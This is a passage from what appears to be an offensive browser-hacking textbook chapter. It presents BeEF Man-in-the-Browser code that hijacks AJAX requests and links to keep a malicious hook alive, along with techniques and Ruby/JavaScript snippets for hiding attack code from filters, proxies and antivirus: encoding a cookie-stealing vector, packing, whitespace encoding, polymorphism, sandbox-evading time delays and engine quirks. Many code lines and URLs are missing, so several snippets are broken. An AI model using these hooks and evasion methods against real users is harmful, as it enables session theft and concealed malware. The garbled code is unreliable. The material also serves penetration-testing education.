When the user clicks the link, which has been dynamically modified with the new onClick attribute as shown in the preceding code, a pop-under pointing to will be loaded. What you want to achieve with this technique is to load a resource that contains your JavaScript hook. If you can combine it with the Man-in-the-Browser or IFrame techniques, you can prevent losing the hook if the victim closes the current hooked tab, achieving longer persistence.

Using Man-in-the-Browser Attacks

Asynchronous JavaScript and XML, or AJAX, is one of the most popular ways to create highly responsive web applications. Thanks to the explosive growth of AJAX, JavaScript was given a second life. Naturally, attackers have started to use AJAX too.

One of the benefits of using AJAX as an attacker is enhanced Man-in-the-Browser (MitB) techniques. Using these techniques provides a more effective way to achieve persistence, and overcomes a number of the traditional IFrame overlay security controls from earlier because it also works in the presence of X-Frame-Options headers or other Framebusting logic.

A MitB attack, as discussed briefly in Chapter 2, allows you to watch what the user is doing, for instance clicking a link within the same-origin, or submitting a form. MitB code is able to intercept and extend the DOM event-handling functionality, and if it chooses, perform the user-initiated action dynamically. At this point the correct resources are retrieved and results are returned back to the user, while still maintaining persistence to your attacker-controlled server.

The difference between normal page behavior and a MitB poisoned page resides in the fact that MitB loads resources asynchronously while keeping the hook alive. For example, if a target were hooked through a Reflected XSS, a simple click on a link to the same origin would result in losing the hook. This happens because the page is reloaded and the script, which was injected through the XSS, is no longer present in the DOM of the page. Although this issue can be addressed using the IFrame techniques previously described, as you have seen this might not work in certain cases. The MitB technique on the other hand is likely to work in more situations where IFrames can’t be used.

Man-in-the–Browser vs. Man-in-the-Middle Attacks

Whereas a Man-in-the-Middle (MitM) attack generally refers to eavesdropping attacks at the network level, Man-in-the-Browser refers to eavesdropping attacks at the application level or, even better, at the browser level. A similarity with MitM is the relaying of data that was intended for the legitimate server back to the attacker. MitB techniques are used extensively by banking malware like SpyEye and Zeus15 in order to subvert the content rendered by the browser when users visit their banking websites.

Page content is altered in various ways depending on the malware configuration. The final result is often a modified look and feel of the page’s HTML in order to display fake content. For instance, the login page of a banking website may be altered claiming that the bank introduced new “security” features. The user might be asked to provide more details such as date of birth, mother’s maiden name, or even second factor authentication data (for example, RSA one-time PINs).

What makes these attacks hard to spot is the fact that they are completely client side, and are often not seen by the web server. This often limits the effectiveness of server-side mitigations or Web Application Firewalls.

These attacks can be performed in a few different ways. One technique relies on intercepting the traffic of the infected machine when visiting the target bank site, and modifying it when it returns with new HTML content, prior to the browser rendering it. Another technique is injecting custom JavaScript that overrides the page behavior dynamically, poisoning existing web application logic and adding new content.

Hijacking AJAX Calls

MitB attacks aim to hijack AJAX GET and POST requests, and they work in both same- and cross-origin scenarios. These attacks are possible thanks to the flexibility of JavaScript and the DOM. One of the great features of JavaScript is the ability to override the prototypes of built-in DOM methods.

Prototype overriding is one of the tricks used by a MitB attack to hijack AJAX requests. The following snippet from BeEF shows how the “open” method of the XMLHttpRequest object prototype is overridden with custom logic. You won’t be able to just copy this code verbatim though, as it does depend on some of BeEF’s other features too.

init:function (cid, curl) {

beef.mitb.cid = cid;

beef.mitb.curl = curl;

/*Override open method to intercept ajax request*/

var xml_type;

var hook_file = "<%= @hook_file %>";

if (window.XMLHttpRequest && !(window.ActiveXObject)) {

beef.mitb.sniff("Method override");

(function (open) { = function (method, url,

async, mitb_call) {

// Ignore it and don't hijack it.

// It's a request part of the hook polling process

if (mitb_call || (url.indexOf(hook_file) != -1 || \

url.indexOf("/dh?") != -1)) {, method, url, async, true);

} else {

var portRegex = new RegExp(":[0-9]+");

var portR = portRegex.exec(url);

var requestPort;

if (portR != null) { requestPort = portR[0].split(":")[1]; }

//GET request

if (method == "GET") {

//GET request -> cross-origin

if (url.indexOf(document.location.hostname) == -1 || \

(portR != null && requestPort != document.location.port )){

beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);;

}else {

//GET request -> same-domain

beef.mitb.sniff("GET [Ajax Request]: " + url);

if (beef.mitb.fetch(url,


var title = "";

if(document.getElementsByTagName("title").length == 0){

title = document.title;

} else {

title = document.getElementsByTagName(



// write the url of the page

history.pushState({ Be:"EF" }, title, url);




//POST request

beef.mitb.sniff("POST ajax request to: " + url);, method, url, async, true);







After the init function is called, every time is used, its behavior will change according to this custom overridden implementation:

1. Check if the MitB itself initiated the request, or if it is part of the hook communication channel. In the second case, do not hijack it;

2. If the request method is GET, determine if the request is same-origin or cross-origin.

3. If same-origin, load the resource and display its content on the current page, keeping the hook alive. Replace the page title with the original one, and replace the URL bar content with the proper resource URI using the history object (history.pushState).

4. If cross-origin, simply open the resource on a new tab ( to keep the hook alive in the current tab.

5. If the method is POST, just do the request.

Hijacking Non-AJAX Requests

Non-AJAX GET and POST requests can be hijacked as well. Similar to AJAX resources, normal resources are prefetched by the MitB code, subverting default behavior (AKA poisoning) of links and forms.

For instance, if the page contains an <a> tag pointing to a same-origin resource, the MitB adds an onClick event attribute that will execute a JavaScript function. When the user clicks the link, the default behavior (GET request to a page) is prevented, and instead the new onClick event handler will manage the click event. In case the link already contains an onClick attribute, MitB replaces that method, calling a different function. The following code from BeEF is an example:

// Fetches a hooked link with AJAX

fetch:function (url, target) {

try {

var y = new XMLHttpRequest();'GET', url, false, true);

y.onreadystatechange = function () {

if (y.readyState == 4 && y.responseText != "") {

target.innerHTML = y.responseText;




beef.mitb.sniff("GET: " + url);

return true;

} catch (x) {;

beef.mitb.sniff("GET [New Window]: " + url);

return false;



// Hooks anchors and prevents them from linking away

poisonAnchor:function (e) {

try {


if (beef.mitb.fetch(e.currentTarget,

document.getElementsByTagName("html")[0])) {

var title = "";

if(document.getElementsByTagName("title").length == 0){

title = document.title;


title = document.getElementsByTagName(



history.pushState({ Be:"EF" }, title, e.currentTarget);


} catch (e) {

console.error('beef.mitb.poisonAnchor - failed to execute: '+



return false;


var anchors = document.getElementsByTagName("a");

var lis = document.getElementsByTagName("li");

for (var i = 0; i < anchors.length; i++) {

anchors[i].onclick = beef.mitb.poisonAnchor;


for (var i = 0; i < lis.length; i++) {

if (lis[i].hasAttribute("onclick")) {



lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick(

'"+lis[i].getElementsByTagName("a")[0] + "')");




The fetchOnclick function is similar to the fetch function, and has been omitted. You can find the full source code at

Poisoning forms is similar to poisoning links. The only difference is that it requires a bit more logic because the form fields need to be parsed while the onSubmit event is triggered. The result is the same, so the POST request is sent using AJAX, and the target innerHTML is then updated with the proper content, while in the background the hook is still working. The target is unlikely to spot the attack because there are no changes to the look and feel of the page. The only potential indicator of the attack is opening cross-origin links in new tabs, instead of the current window.

From Monitoring to Expanding the Attack Surface

It must be noted that user activity, for example which links are clicked and which forms (including data) are submitted, can be logged and made available to you. This is useful in situations where the user is clicking on cross-origin links. In this particular case, thanks to the Same Origin Policy, loading the resource via AJAX obviously won’t be successful. If this happens, the link is simply opened in a new tab, preventing the loss of the hook because the already hooked tab remains open. You can’t control the newly opened tab, because it’s a different origin. However, you can determine what its URL is, because you have full control of the page DOM.

At this point you can attempt to expand the attack surface by running XssRays on the target resource to look for XSS vulnerabilities. If further flaws are discovered, they can be used to hook the new origin by exploiting the XSS, resulting in the control of the origin loaded in the second tab too. This attack technique with XssRays is covered in Chapter 9.

As with all of the techniques available for maintaining a persistent communication channel, there will always be varying degrees of success. One of the potential issues with using MitB logic is handling complex JavaScript-based applications. For instance, when an already existing onClickattribute is poisoned through the MitB functionality, some previous code might get overridden, because the legitimate function is simply replaced. A way to overcome this limitation is using addEventListener, or attachEvent in the case of Internet Explorer, to dynamically call a new function when the same event is triggered16. Using such an approach allows for stacking event handlers, so the new injected ones are called after the existing ones executed. The same problem occurs when appending the response of a poisoned AJAX request to the right page fragment. MitB techniques work well in many situations, but be aware that you may need to customize the default behavior for targeted attacks in complex JavaScript-based web applications.

Evading Detection

Evading detection from Web Application Firewalls, inspecting web proxies or client-side heuristic Anti-Virus technology is a cat-and-mouse game. Security researchers often find new evasion techniques that work for a period of time. When the techniques become public knowledge, defenders start to implement detection techniques, and the current evasion technique becomes less effective. Translating this into pseudo-code may look like this:




sleep 10


sleep 20



Don’t forget that the time it takes for a detection mechanism to be implemented universally may be considerable; the evasion technique will still continue to work in all those environments where the detection is not yet in place. Chaining evasion techniques together can also assist with trying to avoid detection. This will not evade the best human mind if manual analysis is in place, but it will be very effective with proxies and other security devices that inspect the content of HTTP or other protocols.

Imagine a Russian nesting doll (matryoshka), where each layer is a different evasion technique, and the real JavaScript code is then nested inside. Bear in mind that obfuscating JavaScript will not prevent the browser from understanding your code.

Various techniques to help reduce the likelihood that your JavaScript code is detected are presented in the following sections. Each discussed technique has been implemented as an extension within the BeEF framework.

Bear in mind that encoding and obfuscation should not be used to achieve confidentiality of your data. With enough time, every obfuscation technique can be defeated.

Evasion using Encoding

The first and easiest way to hide the code you want to execute is by encoding it. In this context, encoding and decoding is the process of transforming code from one format into another. Many different encodings and techniques are available within a browser. Some of them are as simple as using base64 to encode a plaintext string. Others are more advanced and rely on particular aspects of the JavaScript language, such as non-alphanumeric codes.

Base64 Encoding

A common detection technique used to evaluate potentially malicious JavaScript is to implement Regex-based filters that search for eval, document.cookie, or other keywords that can be potentially used for malicious purposes. If you wanted to steal a web application’s cookies, not marked asHttpOnly, you would execute:


This code will send the cookies to your site. Unfortunately, the original site’s filter may detect the document.cookie reference and filter it out. To hide the document.cookie code you can base64-encode it, and the attack vector becomes:



The Regex-based filter unfortunately still blocks the vector because the blacklisted eval keyword is still present. There are multiple different ways to get access to the window object, which can help achieve eval behavior by using different statements. For example:


Another method is to use either the setTimeout() or setInterval() functions (or even setImmediate() in newer browsers) all of which evaluate JavaScript functions. Note in the instance of the setTimeout()function that the second argument, which specifies a millisecond delay before calling the function, is not mandatory. If not specified, the function is called immediately. Using setTimeout(), the final code will be:



This code snippet bypasses the Regex-based filter mentioned earlier and demonstrates a method in which multiple evasion techniques can be chained together.

Base64 is not the only way to encode data. Plenty of other methods are available too. For example URL encoding, double URL encoding, Hex encoding, Unicode escapes and so on.

Packing JavaScript

Packing and minifying of JavaScript can also be useful to evade detection, especially if combined with random variables and other techniques described in the following sections. The processing of minifying involves removing all the unnecessary characters from your code without impacting its ability to run. Packing, on the other hand, is more analogous to compression, and often involves shortening variable names and other function calls. Consider the following code snippet, which is analyzed further in the “Random Variables and Methods” section:

var malware = {

version: ‘0.0.1-alpha’,

exploits: new Array(“”,””),

persistent: true


window.malware = malware;

function redirect_to_site(){

window.location = window.malware.exploits[0];



After packing this code with Dean Edwards’ Packer,17 the result will be:

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};


k=[function(e){return r[e]}];e=function(){return’\\w+’};

c=1};while(c--)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+

‘\\b’,’g’),k[c]);return p}(‘b 2={7:\’0.0.1-i\’,4:8 9(

“a://6.c/d.e”,””),f:g};3.2=2;h 5(){3.j=3.2.4[0]};5();’,




As you can see, function and variable names like malware, window, and exploits are still very clear at the bottom of the snippet. The following is the same code, but packed after randomizing variables and methods names:

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};


k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};

while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+

'\\b','g'),k[c]);return p}('h 1={a:\'f\',3:6 7(

"8://9.5/b.c",""),d:e};2.1=1;g 4(){2.i=2.1.3[0]};




You can clearly see the difference between the two packed snippets.

Whitespace Encoding

A very crafty encoding technique, presented by Kolisar at DEFCON 16, is WhiteSpace encoding.18 The idea behind this technique is to binary-encode ASCII values using whitespace characters. If you map the Tab character to 0 and the Space character to 1, you can encode your data with just these two characters. The result is nothing but whitespace, hence the name of the technique. A lot of automated de-obfuscation tools ignore whitespaces, so this technique comes in handy to make de-obfuscation more difficult.

You can use this sample Ruby implementation to generate the encoded JavaScript before using it in your attacks:

def whitespace_encode(input)

output = input.unpack('B*')

output = output.to_s.gsub(/[\["01\]]/, \

'[' => '', '"' => '', ']' => '', '0' => "\t", '1' => ' ')


encoded = whitespace_encode("alert(1)")"whitespace_out.js", 'w'){|f| f.write(encoded)}

As you can see, input into the whitespace_encode() function is converted to a binary representation, then 0 is mapped to Tab and 1 is mapped to Space. The result is written to a new file, enabling you to copy and paste it more easily. The code needs a boot-strapper in order to properly decode and evaluate the input. The following JavaScript implementation includes the whitespace_encoded variable from earlier:

// the TABs are likely to be not working

// if you copy and paste the code from here.

// make sure you try the code snippet.

var whitespace_encoded = " ";

function decode_whitespace(css_space) {

var spacer = '';

for(y = 0; y < css_space.length/8; y++){

v = 0;

for(x = 0; x < 8; x++){

if(css_space.charCodeAt(x+(y*8)) > 9){



if(x != 7){

v = v << 1;



spacer += String.fromCharCode(v);

}return spacer;


var decoded = decode_whitespace(whitespace_encoded)



The decode_whitespace function is used to decode the content of the whitespace_encoded variable, which contains the whitespaces generated through the previous Ruby script. The decoding process reconstructs data characters byte-by-byte. String.fromCharCode is used to return the original string. Finally, the string representation of the decoded instructions is evaluated by setTimeout, and finally executed.

As you can see in Figure 3-15, the decoded source code (alert(1)) is evaluated using a setTimeout() call.

Figure 3-15: An example of the WhiteSpace encoding technique


Non-alphanumeric JavaScript

Believe it or not, the flexibility of the JavaScript language enables you to encode data without using any alphanumeric characters. In 2009, Yosuke Hasegawa, a security researcher from Japan, found a way to encode JavaScript code using only symbols—for example, [],$_+:~{} and a few others.

An in-depth analysis of how this technique works would probably require an entire chapter, so if you want to delve deeper into the topic, refer to the following references and whitepapers. One of the ways to encode data using non-alphanumeric JavaScript is JJencode, which de-obfuscation has been analyzed by Peter Ferrie.19 Another useful resource on obfuscation is the Web Application Obfuscation book.20

Non-alphanumeric JavaScript relies deeply on the specific type casting functionality within JavaScript, which isn’t often found in strongly typed languages such as Java or C++. A few basic concepts that promote this method of JavaScript are presented here.

First, in JavaScript you can cast a variable to a String representation by concatenating it with an empty string:

1+"" //returns "1"

Second, you have many different ways to return a Boolean value from just symbols. For example, with an empty array, empty objects, or simply an empty string:

![] //returns false

!{} //returns false

!"" //returns true

Given this behavior, you can easily construct strings. For instance to construct the string “false”, you can use the following code:


You first start with an empty array [], you negate it using !, and you have a Boolean false. Then wrapping it inside another empty array and concatenating it with yet another empty array, you obtain the string “false”. Now that you can create arbitrary strings, you need to get a reference towindow.

An old example, which used to work in Firefox, is the following:


An updated example that still works in Chrome, is the following:


Both the previous examples rely on either the sort or concat functions returning window, because they don’t know which array is referenced.

At this stage you can create arbitrary strings and get a reference to window, so you can call static methods such as window.alert and others, but you need some more trickery to evaluate code. Various ways to achieve that have been discussed previously, but still one of the shortest methods is by using constructor:


If you access the constructor two times from an array object, you get Function. From there, you can pass strings of arbitrary code to be evaluated, such as “alert(1)”.

A number of tools exist that can assist with the generation of non-alphanumeric JavaScript including JJencode21 and AAencode,22 both from Yosuke Hasegawa. AAencode even demonstrates how you can encode JavaScript with Japanese style emoticon characters. An example of alert(1)encoded with JJencode is the following:










As you can see, the number of characters needed to encode a short function such as alert(1) is quite large. This makes this encoding technique very interesting but not always effective if you need to encode hundreds of lines of JavaScript. Regardless of its applicability, it’s useful to have another encoding technique available to you to hide small pieces of code.

The original JJencode idea from Yosuke piqued the interest of the security industry, leading to further experiments in the field and eventually to the creation of the Diminutive NoAlNum JS Contest23 on by Robert Hansen.

Evasion using Obfuscation

The previous sections have demonstrated how encoding works, and how it comes in handy when hiding your JavaScript code. Obfuscation is another method to hide your code, and when combined with encoding, can become a very effective way to bypass network filters. These techniques are common in the wild; the delivery of client-side attacks from exploit-kits such as BlackHole24 often leverage obfuscated and encoded JavaScript payloads. The following sections examine various techniques to help make your code less detectable.

Random Variables and Methods

If you are a developer, you know that writing clear and maintainable code is a priority. The following code is very easy to read thanks to the self-explanatory nature of its variables and method names. A new object, malware, is created, with various properties. The malware object is then attached to the window object, and the redirect_to_site() function is called, which will redirect the browser to the first URL in the exploits array.

var malware = {

version: '0.0.1-alpha',

exploits: new Array("",""),

persistent: true


window.malware = malware;

function redirect_to_site(){

window.location = window.malware.exploits[0];



Now imagine there is a network filtering solution that is looking through network traffic with a Regex filter searching for malware, version number, and redirect_to_malware() or other function names. This is more common than you can imagine and can be effective if server-side code polymorphism is not used.

Server-side Polymorphism

Mainly exploited by malware, this technique is used to change the code in such a way that it’s difficult to mark it as malicious based on static signatures25. The code is also changed per-hook, meaning that if the same malware infects two machines, the code if compared will be different but with the same functionality.

Achieving basic server-side code polymorphism is not too difficult. The following simple demonstration uses a Hash data structure per hooked browser (if you want to achieve per-session polymorphism), where original values and randomized values are stored for future reference. The following Ruby code is an example:

code = <<EOF

var malware = {

version: '0.0.1-alpha',

exploits: new Array("",""),

persistent: true


window.malware = malware;

function redirect_to_site(){

window.location = window.malware.exploits[0];




def rnd(length=5)

chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ_'

result = ''

length.times { result << chars[rand(chars.size)] }



lookup = {

"malware" => rnd(7),

"exploits" => rnd(),

"version" => rnd(),

"persistent" => rnd(12),

"0.0.1-alpha" => rnd(10),

"redirect_to_site" => rnd(4)


lookup.each do |key,value|

code = code.gsub!(key, value)

end"result.js", 'w'){|f|f.write(code)}

Every time you call the preceding code (for instance, when you hook a new browser), the JavaScript code in result.js will be different. For example:

var uxGfLVC = {

sXCrv: 'ZEpXkhxSMz',

egCSx: new Array("",""),

LctUZLQnJ_gp: true


window.uxGfLVC = uxGfLVC;

function HrhB(){

window.location = window.uxGfLVC.egCSx[0];



The randomized variables and function names do not take into consideration scope. If the scope is considered, the resulting code will certainly be more difficult for a human to analyze. Suppose that the previous code contained another function called execute(), and redirect_to_site() accepted an input parameter:

function execute(cmd){



function redirect_to_site(input){


window.location = window.malware.exploits[0];



Obfuscating the example considering scope this time would result in the following code. It is less readable for humans because they may incorrectly conclude the same global variables are used across multiple functions.

function gSYYtNBjNFbZ(napSj){



function HrhB(napSj){


window.location = window.uxGfLVC.egCSx[0];



Mixing Object Notations

You may be accustomed to seeing properties accessed with the Dot notation style than the Bracket notation if you code review a lot of JavaScript.26 As far as the language is concerned, the two styles are largely equivalent.

The previous code snippets used the Dot notation. For example, when it calls the window object, then the malware object, and finally a property of the malware object:


The same code with Bracket notation is as follows:


Mixing the two notations you can write perfectly valid code like this:


Expanding this, you can combine this technique with the examples from the previous sections, including base64 encoding, to create the following:

var uxGfLVC = {

sXCrv: 'ZEpXkhxSMz',

egCSx: new Array("\x68\x74\x74\x70\x3A\x2F\x2F"+




LctUZLQnJ_gp: true


window['uxGfLVC'] = uxGfLVC;

function HrhB(){


/ution/,'tion')] = window.uxGfLVC['egC'+




You can clearly (or unclearly) see how the code is less readable using a mix of Dot and Bracket notation.

Arrays are commonly queried using array[index] or array['string_element']. Looking at code from the previous example, where object methods or properties are accessed the same way, combined with non-meaningful variable names, you might think those brackets are used to get items from data structures. This is, of course, not the case, but just what you want to achieve: confusion. This confusion is directed not only at the human analyst, but potentially a network filtering solution as well.

Time Delays

Time-based checks are another method in which malware can attempt to evade emulation. Malware detection technology often emulates JavaScript engines, particularly those that may be present in a WAF or proxy. Unfortunately, these engines often ignore setTimeout() or setInterval() delays for performance reasons. An inline networking proxy solution that is checking for JavaScript-borne malware is unlikely to wait for 30 seconds, to the detriment of the user.

This kind of behavior can be exploited by implementing logic that will voluntarily delay execution, for example with setTimeout(). Functions that are called after the elapsed time can also check the Date() object to see if the expected delay was respected. If it’s not, the decryption routine needed to execute the real malicious code is not triggered. These techniques, while effective against automated analysis of potentially malicious JavaScript, may not necessarily avoid detection by a human. An example is the following:

var timeout = 10000;

var interval = new Date().getSeconds();

function timer(){

var s_interval = new Date().getSeconds();

var diff = s_interval - interval;

if(diff == 10 && diff > 0) key = diff + "aaa"

if(diff == -10 && diff < 0) key = diff + "bbb"



function decrypt(key){

// decryption routine



setTimeout("timer()", timeout);

The timer() function is called after 10 seconds of delay. When the program flow enters that function, a check is made to see if 10 seconds have actually passed. If the expected time delay is verified, the key for the decryption routine is created, and the decryption routine is called. If the preceding code is obfuscated, including different time delays to multiple parts, it will become trickier to analyze. You might want to use different time delays in your code. This technique comes in handy, as most JavaScript sandboxes used for malware analysis have fixed timeouts, after which they give up analyzing the obfuscated code.

Mixing Content from Another Context

Another method to obfuscate JavaScript is by mixing contexts. When a human is de-obfuscating JavaScript, the first thing they may look at is the JavaScript code itself—we would consider this a single context. Imagine if the code was broken up into multiple parts, or contexts, and they each need information from different contexts in order to function. The following code is calling the decrypt() function, passing as its parameter the concatenation of two String objects (from the DOM):


<div id="hidden_div">




The second string comes from the page URI: :

function decrypt(key){

// decryption routine



var key = document.getElementById('hidden_div').innerHTML;

var key2 = location.href.split("#")[1];

decrypt(key + key2);

If a human analyst de-obfuscates just the script itself their result won’t be overly effective. The results of using this technique can be seen in Figure 3-16:

Figure 3-16: Obfuscating code mixing two different contexts


The same concept can be extended to different contexts, not only the DOM. PDF files, Flash content, and Java Applets are all callable from JavaScript, so pieces of information can be pulled in from multiple disparate contexts.

Using the callee Property

In JavaScript, if arguments.callee is called inside a function, it returns the function itself. This is sometimes useful when using anonymous recursive functions. Unfortunately, the use of arguments.callee is being deprecated from JavaScript, and will not run if using ECMAScript version 5 in strict mode.

The fact the function itself is returned by arguments.callee can be exploited to make de-obfuscation trickier. Imagine the function is performing a check on the code length of itself. If this check fails, parts of the code will not be executed. If someone is manually evaluating the code, by changing it, this check will likely fail. This is common when manually reviewing obfuscated code. For example, nested eval() calls might be replaced with helper functions such as console.log() or custom printing functions, to better understand the code before it’s being evaluated.

If such an approach is used inside an obfuscated function that relies on arguments.callee to check for its own length, the part of the sample that contains the malicious code may never get executed. When such obfuscated code gets modified during manual analysis, and the check on the code length is not, the malicious code will simply not run. To better understand how this works, a Ruby implementation of this technique is shown here:

placeholder = "XXXXXX"

code = <<EOF

function boot(){

var key = arguments.callee.toString().replace(/\\W/g,"");


if(key.length == #{placeholder}){

console.log("verification OK");

//... malicious code here


console.log("verification FAIL");

//... dead code here}



code_length = code.gsub(/\W/,"").length

# XXXXXX -> 6 chars

digits = code_length.to_s.length # returns the number of integer digits

if(digits >= placeholder.length)

to_add = digits - placeholder.length

final_code = code.gsub(placeholder , (code_length + to_add).to_s)


to_remove = placeholder.length - digits

final_code = code.gsub(placeholder , (code_length - to_remove).to_s)

end"result.js", 'w'){|f|f.write(final_code)}

The resulting JavaScript will be written to result.js, and looks like this:

function boot(){

var key = arguments.callee.toString().replace(/\W/g,"");


if(key.length == 166){

console.log("verification OK");

//... malicious code here


console.log("verification FAIL");

//... dead code here



For the sake of the example, the code itself is not obfuscated, nor is the 166 Integer calculated through the Ruby script, but they can both easily be obfuscated with one of the many techniques described earlier. For example, after adapting the previous Ruby code, you might want to replace 166with:

document.getElementById('hidden_div').innerHTML +


The document.getElementByID() function will retrieve an element from the current document with an ID of hidden_div, which may return 160. The second part will retrieve all the base64-encoded content after the fragment identifier from the current document, decode it, and return the value (that is, 6). Summing these together will result in 166. This is a very simple example of how you can combine different encoding and obfuscation techniques. Layering and chaining some of the techniques presented so far will assist you with hiding your JavaScript code from automated and manual analysis.

Evasion using JavaScript Engines Quirks

If you know which rendering engine you want to target, you can refine your obfuscation techniques to make de-obfuscation trickier by using JavaScript quirks between different rendering engines. These quirks can be abused to allow your code to follow a different path, depending on which JavaScript engine you use while de-obfuscating it.

For instance, Trident (Internet Explorer’s engine) returns true if the following code is evaluated. Gecko and WebKit, on the other hand, return false.


Another similar trick to identify Internet Explorer is by using conditional comments, which work only on IE. The following snippet is a very simple example of how the Boolean negation ! is applied only if conditional comments are enabled with @cc_on:


If the code is evaluated by IE, it will be effectively interpreted as !false, resulting in the is_ie variable being true. In every other browser, the variable will be false because the Boolean negation will be considered just a code comment.

Now imagine you are targeting Internet Explorer and the server-side HTTP filtering engine uses SpiderMonkey (the JavaScript engine used by Firefox). If the filtering engine (using SpiderMonkey) evaluates the following code the flow will always end up in the else block:


... // Malicious code for IE browser


... // Dead and Not-Malicious code for non-IE browsers


The filtering engine will parse the code in the else statement and diagnose it as not malicious. The whole JavaScript content will be allowed by the proxy, and will then be potentially executed by an Internet Explorer browser. This time though, the logic flow that gets followed leads to the malicious code.

The same concept applies while manually de-obfuscating the code, in case the evaluation is done within a browser or other tools that rely on a particular JavaScript engine. The example can be flipped the other way around depending on what filtering solution you want to bypass, but the concept remains the same.


In this chapter, you have examined why retaining control is fundamental for browser hacking. The establishment of a communication channel and persisting your control is crucial if you want to be successful when compromising your target.

Various techniques to achieve communication and persistence have been presented, and it’s now up to you to decide which method to use, or perhaps a combination of them, to achieve the best result. One possibility is that when communicating to the browser you might opt for a standardXMLHttpRequest communication channel. Then you might get it to automatically upgrade to the WebSocket protocol if supported. Further, you might then achieve persistence by combining IFrames and pop-unders. The best option will depend a lot on your specific attacking scenario.

Retaining control of the target browser will give you the opportunity to modularize the different attack code and make real-time decisions. This gives you the option of an attacker’s feedback loop. A particular action may unveil a subsequent issue, which when further investigated may expose more issues. Using this method you can choose which branch of the decision tree to go down as it presents itself. For example, you might identify all active hosts on the target browser’s local network and then choose only these to port scan.

You’ve also examined various techniques to minimize the likelihood your instructions are blocked by filters. Using these methods your code might even be too obscure for simple manual analysis. Of course, this will depend on the sophistication of your obfuscation and the sophistication of your target.

You have explored many techniques that you can use to retain control of your target browser. You are now ready to bend the browser’s functionality against itself. Let’s jump straight into the following chapters that focus on attacking the browser.


1. What are the advantages in using a WebSocket protocol instead of an XmlHttpRequest channel?

2. Describe how a DNS-based channel works, and why it’s good to have a stealthy communication.

3. What is hooking a browser?

4. Why can Man-in-the-Browser be effective in situations when IFrames cannot be used?

5. How does the WhiteSpace encoding evasion technique work?

6. Imagine an environment where you have a network protected by a web filtering solution. Which evasion techniques would you use? How would you combine them?

7. Why would a time delay evasion technique be effective against Malware detection technologies?

8. Give an example of hijacking a DOM event.

9. What is the most reliable persistence technique in your opinion? Would you combine some of the techniques discussed previously?

10. What does the following encoded string do? You can download the code from




















For answers to the questions please refer to the book’s website at or the Wiley website at:


1. Mayhem. (2001). IA32 Advanced Function Hooking. Retrieved March 8, 2013 from

2. (2013). WebRTC. Retrieved March 8, 2013 from

3. Mozilla. (2013). Closures. Retrieved March 8, 2013 from

4. Eric Law. (2010). XDomainRequest - Restrictions, Limitations and Workarounds. Retrieved March 8, 2013 from

5. Alex Russel. (2006). Comet: Low Latency Data for the Browser. Retrieved March 8, 2013 from

6. (2012). Retrieved March 8, 2013 from

7. Ilya Grogorik. (2009). EventMachine based WebSocket server. Retrieved March 8, 2013 from

8. EventMachine Team. (2008). EventMachine. Retrieved March 8, 2013 from

9. Opera. (2012). An Introduction to HTML5 web messaging. Retrieved March 8, 2013 from

10. I. Fette and A. Melkinov. (2011). The Websocket Protocol. Retrieved March 8, 2013 from

11. Securitywire. (2010). Iodine rules. Retrieved March 8, 2013 from

12. Kenton Born. (2010). Browser-based Covert Data Exfiltration. Retrieved March 8, 2013 from

13. Mozilla. (2013). Manipulating the browser history. Retrieved March 8, 2013 from

14. Hans-Peter Buniat. (2012). jQuery pop-under. Retrieved March 8, 2013 from

15. IOActive. (2012). Reversal and Analysis of Zeus and SpyEye Banking Trojans. Retrieved March 8, 2013 from

16. Mozilla. (2013). EventTarget. Retrieved March 8, 2013 from

17. Dean Edwards. (2010). Packer. Retrieved March 8, 2013 from

18. Kolisar. (2008). WhiteSpace: A Different Approach to JavaScript Obfuscation. Retrieved March 8, 2013 from

19. Peter Ferrie, (2011). Malware Analysis. Retrieved March 8, 2013 from

20. Mario Heiderich, Eduardo Alberto Vela Nava, Gareth Heyes, and David Lindsay. (2011). Web Application Obfuscation. Retrieved March 8, 2013 from

21. Yosuke Hasegawa. (2009). JJEncode. Retrieved March 8, 2013 from

22. Yosuke Hasegawa. (2009). AAEncode. Retrieved March 8, 2013 from

23. (2009). Diminutive NoAlNum JS Contest. Retrieved March 8, 2013 from,28687

24. Fraser Howard. (2012). Exploring the Blackhole exploit kit. Retrieved March 8, 2013 from

25. Graham Cluley. (2012). Server-side polymorphism: How mutating web malware tries to defeat anti-virus software. Retrieved March 8, 2013 from

26. Mozilla. (2010). Property Accessors. Retrieved March 8, 2013 from